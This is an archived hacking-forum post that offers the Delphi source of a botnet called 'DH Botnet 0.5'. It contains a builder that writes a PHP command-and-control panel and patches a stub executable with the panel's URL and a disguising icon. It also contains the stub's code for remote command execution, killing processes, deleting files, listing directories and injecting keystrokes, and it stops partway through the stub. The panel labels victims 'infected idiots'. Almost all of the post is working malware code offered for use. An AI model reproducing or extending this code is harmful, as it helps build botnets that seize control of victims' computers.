This forum is in archive mode. You will not be able to post new content.
Pages: [1]

Author Topic: [Delphi] DH Botnet 0.5  (Read 4907 times)

0 Members and 1 Guest are viewing this topic.

Offline Doddy

  • Serf
  • *
  • Posts: 30
  • Cookies: 20
    • View Profile
[Delphi] DH Botnet 0.5
« on: December 16, 2013, 04:31:10 AM »
A botnet made in Delphi

Contains the following:

  • Command Execution
  • List active processes
  • Killing processes
  • List files in a directory
  • Delete a file or directory any
  • Read files
  • Open and close reading
  • Hide and show desktop programs
  • Hide Taskbar and display
  • Open Word and just type make
  • Make the keyboard type only
  • Back to the crazy mouse causing it to move around the screen


ScreenShots :





Sources :

Generator.

Code: (delphi) [Select]
// DH Botnet 0.5
// (C) Doddy Hackman 2013

unit gen;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, sSkinManager, ComCtrls, sPageControl, sStatusBar, StdCtrls,
  sGroupBox,
  sEdit, sLabel, sButton, acPNG, ExtCtrls, Madres, IdHash, IdHashMessageDigest;

type
  TForm1 = class(TForm)
    sSkinManager1: TsSkinManager;
    sPageControl1: TsPageControl;
    sStatusBar1: TsStatusBar;
    sTabSheet1: TsTabSheet;
    sTabSheet2: TsTabSheet;
    sTabSheet3: TsTabSheet;
    sGroupBox1: TsGroupBox;
    sEdit1: TsEdit;
    sGroupBox2: TsGroupBox;
    sEdit2: TsEdit;
    sTabSheet4: TsTabSheet;
    sGroupBox3: TsGroupBox;
    sGroupBox4: TsGroupBox;
    sGroupBox5: TsGroupBox;
    sGroupBox6: TsGroupBox;
    sLabel1: TsLabel;
    sEdit3: TsEdit;
    sLabel2: TsLabel;
    sEdit4: TsEdit;
    sLabel3: TsLabel;
    sEdit5: TsEdit;
    sLabel4: TsLabel;
    sEdit6: TsEdit;
    sGroupBox7: TsGroupBox;
    sButton1: TsButton;
    Image1: TImage;
    sTabSheet5: TsTabSheet;
    sGroupBox8: TsGroupBox;
    Image3: TImage;
    sLabel6: TsLabel;
    sGroupBox9: TsGroupBox;
    sLabel5: TsLabel;
    sEdit7: TsEdit;
    sLabel7: TsLabel;
    sEdit8: TsEdit;
    sLabel8: TsLabel;
    sEdit9: TsEdit;
    sGroupBox10: TsGroupBox;
    sGroupBox11: TsGroupBox;
    Image2: TImage;
    sButton2: TsButton;
    OpenDialog1: TOpenDialog;
    sEdit10: TsEdit;
    procedure sButton2Click(Sender: TObject);
    procedure sButton1Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}
// Functions

procedure savefile(filename, texto: string);
var
  ar: TextFile;

begin

  try

    begin
      AssignFile(ar, filename);
      FileMode := fmOpenWrite;

      if FileExists(filename) then
        Append(ar)
      else
        Rewrite(ar);

      Write(ar, texto);
      CloseFile(ar);
    end;
  except
    //
  end;

end;

function dhencode(texto, opcion: string): string;
// Thanks to Taqyon
// Based on http://www.vbforums.com/showthread.php?346504-DELPHI-Convert-String-To-Hex
var
  num: integer;
  aca: string;
  cantidad: integer;

begin

  num := 0;
  Result := '';
  aca := '';
  cantidad := 0;

  if (opcion = 'encode') then
  begin
    cantidad := length(texto);
    for num := 1 to cantidad do
    begin
      aca := IntToHex(ord(texto[num]), 2);
      Result := Result + aca;
    end;
  end;

  if (opcion = 'decode') then
  begin
    cantidad := length(texto);
    for num := 1 to cantidad div 2 do
    begin
      aca := Char(StrToInt('$' + Copy(texto, (num - 1) * 2 + 1, 2)));
      Result := Result + aca;
    end;
  end;

end;

//

procedure TForm1.FormCreate(Sender: TObject);
begin
  sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
  sSkinManager1.SkinName := 'neonnight';
  sSkinManager1.Active := True;
end;

function md5_encode(const texto: String): String;
var
  makemd5: TIdHashMessageDigest5;
begin
  makemd5 := TIdHashMessageDigest5.Create;
  Result := LowerCase(makemd5.HashStringAsHex(texto));

end;

procedure TForm1.sButton1Click(Sender: TObject);

var
  linea: string;
  aca: THandle;
  code: Array [0 .. 9999 + 1] of Char;
  nose: DWORD;
  marca_uno: string;
  lineafinal: string;
  stubgenerado: string;
  change: DWORD;
  valor: string;

  codigo_botnet: string;

begin

codigo_botnet:='<?php'+sLineBreak+
' '+sLineBreak+
'// DH Botnet'+sLineBreak+
'// Version 0.2'+sLineBreak+
'// Coded By Doddy H'+sLineBreak+
' '+sLineBreak+
'// Datos'+sLineBreak+
' '+sLineBreak+
'$username = "ACA_VA_TU_USER";'+sLineBreak+
'$password = "ACA_VA_TU_PASSWORD_EN_MD5";'+sLineBreak+
'$host = "ACA_VA_EL_HOST";'+sLineBreak+
'$userw = "ACA_VA_EL_USER";'+sLineBreak+
'$passw = "ACA_VA_EL_PASS";'+sLineBreak+
'$db = "ACA_VA_EL_NOMBRE";'+sLineBreak+
'$tiempo_de_carga = "ACA_VA_EL_TIEMPO_DE_CARGA";'+sLineBreak+
' '+sLineBreak+
'//'+sLineBreak+
' '+sLineBreak+
'// Start the party'+sLineBreak+
' '+sLineBreak+
'error_reporting(0);'+sLineBreak+
'mysql_connect($host, $userw, $passw);'+sLineBreak+
'mysql_select_db($db);'+sLineBreak+
' '+sLineBreak+
'//'+sLineBreak+
' '+sLineBreak+
'// Registro'+sLineBreak+
'if (isset($_POST[''entradatrasera''])) {'+sLineBreak+
'    $key = mysql_real_escape_string($_POST[''key'']);'+sLineBreak+
'    $ip = mysql_real_escape_string($_POST[''ip'']);'+sLineBreak+
'    $pais = mysql_real_escape_string($_POST[''pais'']);'+sLineBreak+
'    $username = mysql_real_escape_string($_POST[''username'']);'+sLineBreak+
'    $os = mysql_real_escape_string($_POST[''os'']);'+sLineBreak+
'    $timeout = mysql_real_escape_string($_POST[''timeout'']);'+sLineBreak+
'    $control = 0;'+sLineBreak+
'    $rea = mysql_query("select clave from slaves");'+sLineBreak+
'    while ($ver = mysql_fetch_array($rea)) {'+sLineBreak+
'        if ($ver[0] == $key) {'+sLineBreak+
'            $control = 1;'+sLineBreak+
'        }'+sLineBreak+
'    }'+sLineBreak+
'    if ($control == 0) {'+sLineBreak+
'        mysql_query("INSERT INTO slaves(id,clave,ip,pais,user,os,timeout)values(NULL,''$key'',''$ip'',''$pais'',''$username'',''$os'',''$timeout'')");'+sLineBreak+
'        mysql_query("INSERT INTO ordenes(id,clave)values(NULL,''$key'')");'+sLineBreak+
'    }'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Bots siguen vivos'+sLineBreak+
'if (isset($_POST[''sigovivo''])) {'+sLineBreak+
'    $clave = mysql_real_escape_string($_POST[''clavenow'']);'+sLineBreak+
'    mysql_query("UPDATE slaves set estado=''1'' where clave=''$clave''");'+sLineBreak+
'}'+sLineBreak+
'// Bots mandan rta'+sLineBreak+
'if (isset($_POST[''mandocarajo''])) {'+sLineBreak+
'    $clave = mysql_real_escape_string($_POST[''miclave'']);'+sLineBreak+
'    $rta = mysql_real_escape_string($_POST[''mirta'']);'+sLineBreak+
'    mysql_query("UPDATE ordenes set rta=''$rta'' where clave=''$clave''");'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Ordenes para bots'+sLineBreak+
'if (isset($_POST[''ordenespabots''])) {'+sLineBreak+
'    $h = mysql_real_escape_string($_POST[''clave'']);'+sLineBreak+
'    $rea = mysql_query("select * from ordenes where clave=''$h''");'+sLineBreak+
'    $ver = mysql_fetch_array($rea);'+sLineBreak+
'    $id = mysql_real_escape_string($ver[0]);'+sLineBreak+
'    $clave = mysql_real_escape_string($ver[1]);'+sLineBreak+
'    $orden = mysql_real_escape_string($ver[2]);'+sLineBreak+
'    $arg1 = mysql_real_escape_string($ver[3]);'+sLineBreak+
'    $arg2 = mysql_real_escape_string($ver[4]);'+sLineBreak+
'    $arg3 = mysql_real_escape_string($ver[5]);'+sLineBreak+
'    $rta = mysql_real_escape_string($ver[6]);'+sLineBreak+
'    echo "[+] ID : " . htmlentities($id) . "<br>";'+sLineBreak+
'    echo "[+] Clave : " . htmlentities($clave) . "<br>";'+sLineBreak+
'    echo "[+] Orden : " . htmlentities($orden) . "<br>";'+sLineBreak+
'    echo "[+] Arg1 : " . htmlentities($arg1) . "<br>";'+sLineBreak+
'    echo "[+] Arg2 : " . htmlentities($arg2) . "<br>";'+sLineBreak+
'    echo "[+] Arg3 : " . htmlentities($arg3) . "<br>";'+sLineBreak+
'    echo "[+] Rta : " . htmlentities($rta) . "<br>";'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Main'+sLineBreak+
'elseif (isset($_COOKIE[''portal''])) {'+sLineBreak+
'    colores();'+sLineBreak+
'    $st = base64_decode($_COOKIE[''portal'']);'+sLineBreak+
'    $plit = preg_split("/@/", $st);'+sLineBreak+
'    $user = $plit[0];'+sLineBreak+
'    $pass = $plit[1];'+sLineBreak+
'    if ($user == $username and $pass == $password) {'+sLineBreak+
'        echo "<title>DH Botnet 0.2</title>";'+sLineBreak+
'        if (isset($_POST[''instalar''])) {'+sLineBreak+
'            $todo = "'+sLineBreak+
'create table slaves ('+sLineBreak+
'id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,'+sLineBreak+
'clave TEXT NOT NULL,'+sLineBreak+
'ip TEXT NOT NULL,'+sLineBreak+
'pais TEXT NOT NULL,'+sLineBreak+
'user TEXT NOT NULL,'+sLineBreak+
'os TEXT NOT NULL,'+sLineBreak+
'timeout TEXT NOT NULL,'+sLineBreak+
'estado TEXT NOT NULL,'+sLineBreak+
'PRIMARY KEY (id)'+sLineBreak+
');'+sLineBreak+
'";'+sLineBreak+
'            $todo2 = "'+sLineBreak+
'create table ordenes ('+sLineBreak+
'id int(10) UNSIGNED NOT NULL AUTO_INCREMENT,'+sLineBreak+
'clave TEXT NOT NULL,'+sLineBreak+
'orden TEXT NOT NULL,'+sLineBreak+
'arg1 TEXT NOT NULL,'+sLineBreak+
'arg2 TEXT NOT NULL,'+sLineBreak+
'arg3 TEXT NOT NULL,'+sLineBreak+
'rta TEXT NOT NULL,'+sLineBreak+
'PRIMARY KEY (id)'+sLineBreak+
');'+sLineBreak+
'";'+sLineBreak+
'            if (mysql_query($todo)) {'+sLineBreak+
'                if (mysql_query($todo2)) {'+sLineBreak+
'                    echo "<script>alert(''Installed'');</script>";'+sLineBreak+
'                }'+sLineBreak+
'            } else {'+sLineBreak+
'                echo "<script>alert(''Error'');</script>";'+sLineBreak+
'            }'+sLineBreak+
'        }'+sLineBreak+
'        if (mysql_num_rows(mysql_query("show tables like ''slaves''"))) {'+sLineBreak+
'            // TODO EL CODIGO DEL MENU'+sLineBreak+
'            if (isset($_POST[''about''])) {'+sLineBreak+
'                echo "'+sLineBreak+
'<center>'+sLineBreak+
' '+sLineBreak+
'<h1>[++] Commands :</h1><br><br>'+sLineBreak+
' '+sLineBreak+
'<h2>'+sLineBreak+
'CMD [command]<br>'+sLineBreak+
'GetProcess<br>'+sLineBreak+
'KillProcess [pid]<br>'+sLineBreak+
'ListDir [directory]<br>'+sLineBreak+
'Delete [file]<br>'+sLineBreak+
'OpenFile [file]<br>'+sLineBreak+
'OpenCD <br>'+sLineBreak+
'CloseCD<br>'+sLineBreak+
'HideIcons<br>'+sLineBreak+
'ShowIcons<br>'+sLineBreak+
'HideTaskbar<br>'+sLineBreak+
'ShowTaskbar<br>'+sLineBreak+
'OpenWord [text]<br>'+sLineBreak+
'SendKeys [text]<br>'+sLineBreak+
'CrazyMouse [time]<br>'+sLineBreak+
'</h2>'+sLineBreak+
'<br><br><br>";'+sLineBreak+
'                echo ''<a href="javascript:history.back()"><h1>Back</h1></a></center>'';'+sLineBreak+
'                exit(1);'+sLineBreak+
'            }'+sLineBreak+
'            if (isset($_GET[''borrar''])) {'+sLineBreak+
'                $id = $_GET[''borrar''];'+sLineBreak+
'                if (is_numeric($id)) {'+sLineBreak+
'                    if (@mysql_query("delete from slaves where id=''$id''")) {'+sLineBreak+
'                        if (@mysql_query("delete from ordenes where id=''$id''")) {'+sLineBreak+
'                            echo "<script>alert(''Deleted'');</script>";'+sLineBreak+
'                            echo "<META HTTP-EQUIV=''Refresh'' CONTENT=''0;URL=?''>";'+sLineBreak+
'                        }'+sLineBreak+
'                    }'+sLineBreak+
'                } else {'+sLineBreak+
'                    echo "<script>alert(''DIE MOTHER FUCKER'');</script>";'+sLineBreak+
'                }'+sLineBreak+
'            }'+sLineBreak+
'            if (isset($_GET[''console''])) {'+sLineBreak+
'                $id = $_GET[''console''];'+sLineBreak+
'                if (is_numeric($id)) {'+sLineBreak+
'                    $re = mysql_query("select * from ordenes where id=''$id''");'+sLineBreak+
'                    $ver = mysql_fetch_array($re);'+sLineBreak+
'                    echo "<center><br><h1>Console</h1><br>";'+sLineBreak+
'                    echo "<center><textarea cols=80 rows=40 name=code>";'+sLineBreak+
'                    echo htmlentities($ver[6]);'+sLineBreak+
'                    echo "</textarea></center><br>";'+sLineBreak+
'                    echo ''<a href="javascript:history.back()"><h1>Back</h1></a></center>'';'+sLineBreak+
'                    // ACTUALIZAR A NADA'+sLineBreak+
'                    mysql_query("UPDATE ordenes set orden='''',arg1='''',arg2='''',arg3='''',rta='''' where id=" . $id);'+sLineBreak+
'                    exit(1);'+sLineBreak+
'                } else {'+sLineBreak+
'                    echo "<script>alert(''DIE MOTHER FUCKER'');</script>";'+sLineBreak+
'                }'+sLineBreak+
'            }'+sLineBreak+
'            if (isset($_POST[''mandarcmd''])) { // MUY IMPORTANTE'+sLineBreak+
'                $op = mysql_real_escape_string($_POST[''options'']);'+sLineBreak+
'                $id = mysql_real_escape_string($_POST[''idiotas'']);'+sLineBreak+
'                $orden1 = mysql_real_escape_string($_POST[''cmd1'']);'+sLineBreak+
'                $orden2 = mysql_real_escape_string($_POST[''cmd2'']);'+sLineBreak+
'                $orden3 = mysql_real_escape_string($_POST[''cmd3'']);'+sLineBreak+
'                mysql_query("UPDATE ordenes set orden=''$op'',arg1=''$orden1'',arg2=''$orden2'',arg3=''$orden3'' where id=" . $id);'+sLineBreak+
'                $re = mysql_query("select * from slaves where id=''$id''");'+sLineBreak+
'                $ver = mysql_fetch_array($re);'+sLineBreak+
'                $timeout = $ver[6];'+sLineBreak+
'                $timeout = $timeout + $tiempo_de_carga;'+sLineBreak+
'                $time = $timeout;'+sLineBreak+
'                $timeout = $timeout * 1000;'+sLineBreak+
'                echo "<script>alert(''Wait " . htmlentities($time) . " seconds'');</script>";'+sLineBreak+
'                echo "'+sLineBreak+
'<script type=\"text/javascript\">'+sLineBreak+
'setTimeout (\"location.href=''?console=$id''\",$timeout);'+sLineBreak+
'</script>'+sLineBreak+
'";'+sLineBreak+
'            } //'+sLineBreak+
'            echo "'+sLineBreak+
'<br><br>'+sLineBreak+
'<center>'+sLineBreak+
'<h1>Infected idiots</h1>'+sLineBreak+
'<br><br>'+sLineBreak+
'";'+sLineBreak+
'            $re = mysql_query("select count(clave) from slaves");'+sLineBreak+
'            $ver = mysql_fetch_array($re);'+sLineBreak+
'            if ($ver[0] == 0) { //'+sLineBreak+
'                echo "<script>alert(''No idiots'');</script>";'+sLineBreak+
'            } else {'+sLineBreak+
'                $re = mysql_query("select * from slaves");'+sLineBreak+
'                echo "'+sLineBreak+
'<table border=1  width=1100>'+sLineBreak+
'<td ><b>ID</b></td><td ><b>Key</b></td><td ><b>IP</b></td><td ><b>Country</b></td><td ><b>Username</b></td><td ><b>OS</b></td><td ><b>Timeout</b></td><td><b>Status</b></td><td><b>Option</b></td><tr>'+sLineBreak+
'";'+sLineBreak+
'                $idiotas = array();'+sLineBreak+
'                while ($ver = mysql_fetch_array($re)) {'+sLineBreak+
'                    if ($ver[7] == 1) {'+sLineBreak+
'                        $estado = "Online";'+sLineBreak+
'                    } else {'+sLineBreak+
'                        $estado = "Offline";'+sLineBreak+
'                    }'+sLineBreak+
'                    echo "<td >" . htmlentities($ver[0]) . "</td><td >" . htmlentities($ver[1]) . "</td><td >" . htmlentities($ver[2]) . "</td><td >" . htmlentities($ver[3]) . "</td>";'+sLineBreak+
'                    echo "<td >" . htmlentities($ver[4]) . "</td><td >" . htmlentities($ver[5]) . "</td><td >" . htmlentities($ver[6]) . "</td><td>" . $estado . "<td><a href=?borrar=" . $ver[0] . ">Delete</a></td><tr>";'+sLineBreak+
'                    $idiotas[] = $ver[0];'+sLineBreak+
'                    mysql_query("UPDATE slaves set estado='''' where id=" . $ver[0]);'+sLineBreak+
'                }'+sLineBreak+
'                echo "</table>";'+sLineBreak+
'            } //'+sLineBreak+
'            echo "<form action='''' method=POST>";'+sLineBreak+
'            echo "'+sLineBreak+
' '+sLineBreak+
'<br><br><br><br>'+sLineBreak+
' '+sLineBreak+
'<table>'+sLineBreak+
'<td>'+sLineBreak+
'<b>Idiot :</b>'+sLineBreak+
'</td>'+sLineBreak+
'<td>'+sLineBreak+
'<select name=idiotas>";'+sLineBreak+
'            foreach($idiotas as $idiota) {'+sLineBreak+
'                echo "<option>" . $idiota . "</option>";'+sLineBreak+
'            }'+sLineBreak+
'            echo "'+sLineBreak+
'</select>'+sLineBreak+
'</td><tr>'+sLineBreak+
' '+sLineBreak+
'<td><b>Options : </b></td>'+sLineBreak+
'<td><select name=options>'+sLineBreak+
'<option>CMD</option>'+sLineBreak+
'<option>GetProcess</option>'+sLineBreak+
'<option>KillProcess</option>'+sLineBreak+
'<option>ListDir</option>'+sLineBreak+
'<option>Delete</option>'+sLineBreak+
'<option>OpenFile</option>'+sLineBreak+
'<option>OpenCD</option>'+sLineBreak+
'<option>CloseCD</option>'+sLineBreak+
'<option>HideIcons</option>'+sLineBreak+
'<option>ShowIcons</option>'+sLineBreak+
'<option>HideTaskbar</option>'+sLineBreak+
'<option>ShowTaskbar</option>'+sLineBreak+
'<option>OpenWord</option>'+sLineBreak+
'<option>SendKeys</option>'+sLineBreak+
'<option>CrazyMouse</option>'+sLineBreak+
'</select></td><tr>'+sLineBreak+
' '+sLineBreak+
'<td><b>Command 1 : </b></td><td><input type=text name=cmd1></td><tr>'+sLineBreak+
'<td><b>Command 2 : </b></td><td><input type=text name=cmd2></td><tr>'+sLineBreak+
'<td><b>Command 3 : </b></td><td><input type=text name=cmd3></td>'+sLineBreak+
'</table><br>'+sLineBreak+
'<input type=submit name=mandarcmd value=Send> <input type=submit name=about value=Help>'+sLineBreak+
'";'+sLineBreak+
'            echo "</form>";'+sLineBreak+
'            echo "<br><br><br><br><br><br><br><h2>-- == (C) Doddy Hackman 2013 || Contact : lepuke[at]hotmail[com] || Web : http://doddyhackman.webcindario.com == --</h2>";'+sLineBreak+
'        } else {'+sLineBreak+
'            echo "'+sLineBreak+
'<center><br><br>'+sLineBreak+
'<form action='''' method=POST>'+sLineBreak+
'<h2>Want to install DH Botnet 0.2 ?</h2><br><br>'+sLineBreak+
'<input type=submit name=instalar value=Install>'+sLineBreak+
'</form>";'+sLineBreak+
'        }'+sLineBreak+
'        exit(1);'+sLineBreak+
'    }'+sLineBreak+
'} elseif (isset($_POST[''login''])) {'+sLineBreak+
'    if ($_POST[''user''] == $username and md5($_POST[''passwor'']) == $password) {'+sLineBreak+
'        setcookie("portal", base64_encode($_POST[''user''] . "@" . md5($_POST[''passwor''])));'+sLineBreak+
'        echo "<script>alert(''Welcome idiot'');</script>";'+sLineBreak+
'        echo ''<meta http-equiv="refresh" content=0;URL=>'';'+sLineBreak+
'    } else {'+sLineBreak+
'        echo "<script>alert(''DIE MOTHER FUCKER DIE'');</script>";'+sLineBreak+
'        echo ''<meta http-equiv="refresh" content=0;URL=>'';'+sLineBreak+
'    }'+sLineBreak+
'} elseif (isset($_GET[''poraca''])) {'+sLineBreak+
'    colores();'+sLineBreak+
'    echo "'+sLineBreak+
'<br><h1><center>Login</center></h1>'+sLineBreak+
'<br><br><center>'+sLineBreak+
'<form action='''' method=POST>'+sLineBreak+
'<b>Username : </b><input type=text name=user><br><br>'+sLineBreak+
'<b>Password : </b><input type=password name=passwor><br><br>'+sLineBreak+
'<input type=submit name=login value=Enter><br>'+sLineBreak+
'</form>'+sLineBreak+
'</center><br><br>";'+sLineBreak+
'} else {'+sLineBreak+
'    error();'+sLineBreak+
'}'+sLineBreak+
'//'+sLineBreak+
'// Funciones secundarias'+sLineBreak+
'function colores() {'+sLineBreak+
'    // Colores'+sLineBreak+
'    $color = "#00FF00";'+sLineBreak+
'    $fondo = "#000000";'+sLineBreak+
'    echo "'+sLineBreak+
' '+sLineBreak+
'<STYLE type=text/css>'+sLineBreak+
' '+sLineBreak+
'body,a:link {'+sLineBreak+
'background-color: $fondo;'+sLineBreak+
'color:$color;'+sLineBreak+
'Courier New;'+sLineBreak+
'cursor:crosshair;'+sLineBreak+
'font: normal 0.7em sans-serif,Arial;'+sLineBreak+
'}'+sLineBreak+
' '+sLineBreak+
'input,textarea,fieldset,select,table,td,tr,option,select {'+sLineBreak+
'font: normal 13px Verdana, Arial, Helvetica,'+sLineBreak+
'sans-serif;'+sLineBreak+
'background-color:$fondo;'+sLineBreak+
'color:$color;'+sLineBreak+
'border: solid 1px $color;'+sLineBreak+
'border-color:$color'+sLineBreak+
'}'+sLineBreak+
' '+sLineBreak+
'a:link,a:visited,a:active {'+sLineBreak+
'color:$color;'+sLineBreak+
'font: normal 10px Verdana, Arial, Helvetica,'+sLineBreak+
'sans-serif;'+sLineBreak+
'text-decoration: none;'+sLineBreak+
'}'+sLineBreak+
' '+sLineBreak+
'</style>'+sLineBreak+
' '+sLineBreak+
'";'+sLineBreak+
'}'+sLineBreak+
'function error() {'+sLineBreak+
'    echo ''<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">'+sLineBreak+
'<html><head>'+sLineBreak+
'<title>404 Not Found</title>'+sLineBreak+
'</head><body>'+sLineBreak+
'<h1>Not Found</h1>'+sLineBreak+
'<p>The requested URL was not found on this server.</p>'+sLineBreak+
'</body></html>'';'+sLineBreak+
'    exit(1);'+sLineBreak+
'}'+sLineBreak+
'// End'+sLineBreak+
'mysql_close();'+sLineBreak+
'//'+sLineBreak+
' '+sLineBreak+
'// The End ?'+sLineBreak+
' '+sLineBreak+
'?>'+sLineBreak;


  codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_TU_USER', sEdit7.Text,
    [rfReplaceAll, rfIgnoreCase]);
  codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_TU_PASSWORD_EN_MD5',
    md5_encode(sEdit8.Text), [rfReplaceAll, rfIgnoreCase]);
  codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_HOST', sEdit3.Text,
    [rfReplaceAll, rfIgnoreCase]);
  codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_USER', sEdit4.Text,
    [rfReplaceAll, rfIgnoreCase]);
  codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_PASS', sEdit5.Text,
    [rfReplaceAll, rfIgnoreCase]);
  codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_NOMBRE',
    sEdit6.Text, [rfReplaceAll, rfIgnoreCase]);
  codigo_botnet := StringReplace(codigo_botnet, 'ACA_VA_EL_TIEMPO_DE_CARGA',
    sEdit9.Text, [rfReplaceAll, rfIgnoreCase]);

  stubgenerado := 'server_ready.exe';

  DeleteFile('index_botnet.php');
  savefile('index_botnet.php', codigo_botnet);

  lineafinal := '[url]' + sEdit1.Text + '[url]' + '[time]' + sEdit2.Text +
    '[time]';

  marca_uno := '[63686175]' + dhencode(lineafinal, 'encode') + '[63686175]';

  aca := INVALID_HANDLE_VALUE;
  nose := 0;

  DeleteFile(stubgenerado);
  CopyFile(PChar(ExtractFilePath(Application.ExeName) + '/' + 'Data/stub.exe'),
    PChar(ExtractFilePath(Application.ExeName) + '/' + stubgenerado), True);

  linea := marca_uno;
  StrCopy(code, PChar(linea));
  aca := CreateFile(PChar(stubgenerado), GENERIC_WRITE, FILE_SHARE_READ, nil,
    OPEN_EXISTING, 0, 0);
  if (aca <> INVALID_HANDLE_VALUE) then
  begin
    SetFilePointer(aca, 0, nil, FILE_END);
    WriteFile(aca, code, 9999, nose, nil);
    CloseHandle(aca);
  end;

  if not(sEdit10.Text = '') then
  begin
    try
      begin

        valor := IntToStr(128);

        change := BeginUpdateResourceW
          (PWideChar(wideString(ExtractFilePath(Application.ExeName)
                + '/' + stubgenerado)), False);
        LoadIconGroupResourceW(change, PWideChar(wideString(valor)), 0,
          PWideChar(wideString(sEdit10.Text)));
        EndUpdateResourceW(change, False);
        sStatusBar1.Panels[0].Text := '[+] Done ';
        sStatusBar1.Update;
      end;
    except
      begin
        sStatusBar1.Panels[0].Text := '[-] Error';
        sStatusBar1.Update;
      end;
    end;
  end
  else
  begin
    sStatusBar1.Panels[0].Text := '[+] Done ';
    sStatusBar1.Update;
  end;

end;

procedure TForm1.sButton2Click(Sender: TObject);
begin

  OpenDialog1.InitialDir := GetCurrentDir;
  OpenDialog1.Filter := 'ICO|*.ico|';

  if OpenDialog1.Execute then
  begin
    Image2.Picture.LoadFromFile(OpenDialog1.filename);
    sEdit10.Text := OpenDialog1.filename;
  end;

end;

end.

// The End ?

Stub.

Code: (delphi) [Select]
// DH Botnet 0.5
// (C) Doddy Hackman 2013

// Stub

program stub;

// {$APPTYPE CONSOLE}
{$POINTERMATH ON}

uses
  SysUtils, WinInet, Windows, TlHelp32, ShellApi;

var
  datos: string;
  clave: string;
  ip: string;
  pais: string;
  user: string;
  os: string;

  url_master: string;
  time: string;

  code: string;
  ordenes_re: string;
  ordenes_cmd: string;
  ordenes_ar1: string;
  ordenes_ar2: string;
  ordenes_ar3: string;

var
  dir_hide, dir, carpeta, nombrereal, directorio, rutareal, yalisto: string;
  registro: HKEY;

  ob: THandle;
  codex: Array [0 .. 9999 + 1] of Char;
  nose: DWORD;
  todo: string;


  // Functions server

function crazy_mouse(number: string): string;
var
  i: integer;
  code: string;
begin
  code := '';
  For i := 1 to StrToInt(number) do
  begin
    Sleep(1000);
    SetCursorPos(i, i);
  end;
  code := '[?] Crazy Mouse : OK';
  Result := code;
end;

function SendKeys(texto: string): string;
// Thanks to Remy Lebeau for the help
var
  eventos: PInput;
  controlb, controla: integer;
  code: string;
begin

  code := '';
  code := '[?] SendKeys : OK';

  GetMem(eventos, SizeOf(TInput) * (Length(texto) * 2));

  controla := 0;

  for controlb := 1 to Length(texto) do
  begin

    eventos[controla].Itype := INPUT_KEYBOARD;
    eventos[controla].ki.wVk := 0;
    eventos[controla].ki.wScan := ord(texto[controlb]);
    eventos[controla].ki.dwFlags := KEYEVENTF_UNICODE;
    eventos[controla].ki.time := 0;
    eventos[controla].ki.dwExtraInfo := 0;

    Inc(controla);

    eventos[controla].Itype := INPUT_KEYBOARD;
    eventos[controla].ki.wVk := 0;
    eventos[controla].ki.wScan := ord(texto[controlb]);
    eventos[controla].ki.dwFlags := KEYEVENTF_UNICODE or KEYEVENTF_KEYUP;
    eventos[controla].ki.time := 0;
    eventos[controla].ki.dwExtraInfo := 0;

    Inc(controla);

  end;

  SendInput(controla, eventos[0], SizeOf(TInput));

  Result := code;

end;

function escribir_word(texto: string): string;
var
  code: string;
begin
  code := '';
  code := '[?] Word Joke : OK';
  ShellExecute(0, nil, PChar('winword.exe'), nil, nil, SW_SHOWNORMAL);
  Sleep(5000);
  SendKeys(texto);
  Result := code;

end;

function cambiar_barra(opcion: string): string;
var
  code: string;
begin
  code := '';

  if (opcion = 'hide') then
  begin
    ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_HIDE);
    code := '[?] Hidden Taskbar : OK';
  end
  else
  begin
    ShowWindow(FindWindow('Shell_TrayWnd', nil), SW_SHOWNA);
    code := '[?] Show Taskbar : OK';
  end;

  Result := code;

end;

function cambiar_iconos(opcion: string): string;
var
  code: string;
  acatoy: THandle;
begin
  code := '';
  acatoy := FindWindow('ProgMan', nil);
  acatoy := GetWindow(acatoy, GW_CHILD);
  if (opcion = 'hide') then
  begin
    ShowWindow(acatoy, SW_HIDE);
    code := '[?] Hidden Icons : OK';
  end
  else
  begin
    ShowWindow(acatoy, SW_SHOW);
    code := '[?] Show Icons : OK';
  end;
  Result := code;
end;

function listardirectorio(dir: string): string;
var

  busqueda: TSearchRec;
  code: string;

begin

  code := '';

  FindFirst(dir + '\*.*', faAnyFile + faDirectory + faReadOnly, busqueda);

  code := code + '[?] : ' + busqueda.Name + sLineBreak;

  while FindNext(busqueda) = 0 do
  begin
    code := code + '[?] : ' + busqueda.Name + sLineBreak;
  end;

  Result := code;

end;

function borraresto(archivo: string): string;
var
  code: string;
begin

  code := '';

  if DirectoryExists(archivo) then
  begin
    if (RemoveDir(archivo)) then
    begin
      code := '[?] Directory removed';
    end
    else
    begin
      code := '[?] Error';
    end;
  end;
  if FileExists(archivo) then
  begin
    if (DeleteFile(PChar(archivo))) then
    begin
      code := '[?] File removed';
    end
    else
    begin
      code := '[?] Error';
    end;
  end;

  Result := code;

end;

function matarproceso(pid: string): string;
var
  vano: THandle;
  code: string;

begin

  code := '';
  vano := OpenProcess(PROCESS_TERMINATE, FALSE, StrToInt(pid));

  if TerminateProcess(vano, 0) then
  begin
    code := '[?] Kill Process : OK';
  end
  else
  begin
    code := '[?] Kill Process : ERROR';
  end;

  Result := code;

end;

function listarprocesos(): string;
var
  conector: THandle;
  timbre: LongBool;
  indicio: TProcessEntry32;
  code: string;

begin

  code := '';

  conector := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  indicio.dwSize := SizeOf(indicio);

  timbre := Process32First(conector, indicio);

  while timbre do

  begin

    code := code + '[?] Name : ' + indicio.szExeFile + '[?] PID : ' + IntToStr
      (indicio.th32ProcessID) + sLineBreak;

    timbre := Process32Next(conector, indicio);

  end;

  Result := code;

end;

function ejecutar(cmd: string): string;
